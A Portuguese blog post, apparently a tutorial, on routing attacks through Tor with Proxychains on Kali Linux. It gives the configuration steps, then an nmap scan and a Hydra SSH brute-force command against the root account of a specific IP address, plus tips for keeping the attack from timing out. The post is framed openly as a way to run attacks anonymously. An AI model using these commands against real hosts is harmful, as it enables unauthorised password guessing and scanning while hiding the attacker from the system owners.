E ae galera, hoje vamos entender e realizar ataques e varreduras com o Tor e Proxychains.
O Proxychains é um pacote que permite fazer o roteamento das
requisições das suas aplicações através de proxys escolhidos por você e
colocado em uma lista. Mas nesse caso iremos fazer uma adaptação que vai
unir o útil ao extremamente agradável. Ao invés do Proxychains realizar
o roteamento para uma lista específica de proxys, iremos instalar o Tor
Router e redirecionar as requisições diretamente para a porta do Tor.
Ou seja, iremos realizar varreduras diretamente pela Tor.
Como ambiente escolhi utilizar o Kali Linux, mas caso você necessite utilizar em outra distribuição, basta instalar os pacotes:
Debian/Ubuntu:
# sudo apt-get install tor
# sudo apt-get install proxychains
CentOS/RHEL7:
# sudo yum install tor
# sudo yum install proxychains
Instalando e configurando o Tor
root@kali:~#: sudo apt-get install tor
Agora vamos editar o arquivo de configurações do Proxychains nativo do Kali
root@kali:~#: nano /etc/proxychains.conf
Comente a linha "strict_chain" e descomente a linha "dynamic_chain".
Ficando assim:
E agora no final deste mesmo arquivo, vamos adicionar:
socks5 127.0.0.1 9050
Ficando assim:
Inicializando o serviço da Tor
root@kali:~#: service tor start root@kali:~#: tor
Veja se o serviço esta realmente rodando:
root@kali:~#: service tor status
Use comando:
root@kali:~#: proxychains firefox
e acesse meuip.com.br para ver seu IP de proxy.
Agora acesse o utrace e coloque o IP do seu Proxy para saber a localização do servidor que você está utilizando como Gateway em en.utrace.de
Agora você esta redirecionado para um gateway em outro lugar.
Agora quando for realizar alguma varredura é só executar o comando com o proxychains na frente
root@kali:~#: proxychains nmap -sC -sS 177.126.175.230
Para executar o reload no tor basta
root@kali:~#: service tor restart
Verificando o gateway atual
root@kali:~#: curl ifconfig.me
No caso do NMAP, busque sempre varrer pelo IP, pois às vezes, dependendo da localização do seu proxy, a resolução dos nomes pode far timeout ou crashear o scan.
Realizando ataques de força bruta via Tor
Vamos executar um exemplo simples de ataque de brute force usando o Hydra e uma passlist
root@kali:~#: proxychains hydra -l root -P passlist.txt 177.126.175.230 ssh
No caso é recomendado o uso de passlists curtas para evitar que os erros de timeout comprometam o ataque.
Nenhum comentário:
Postar um comentário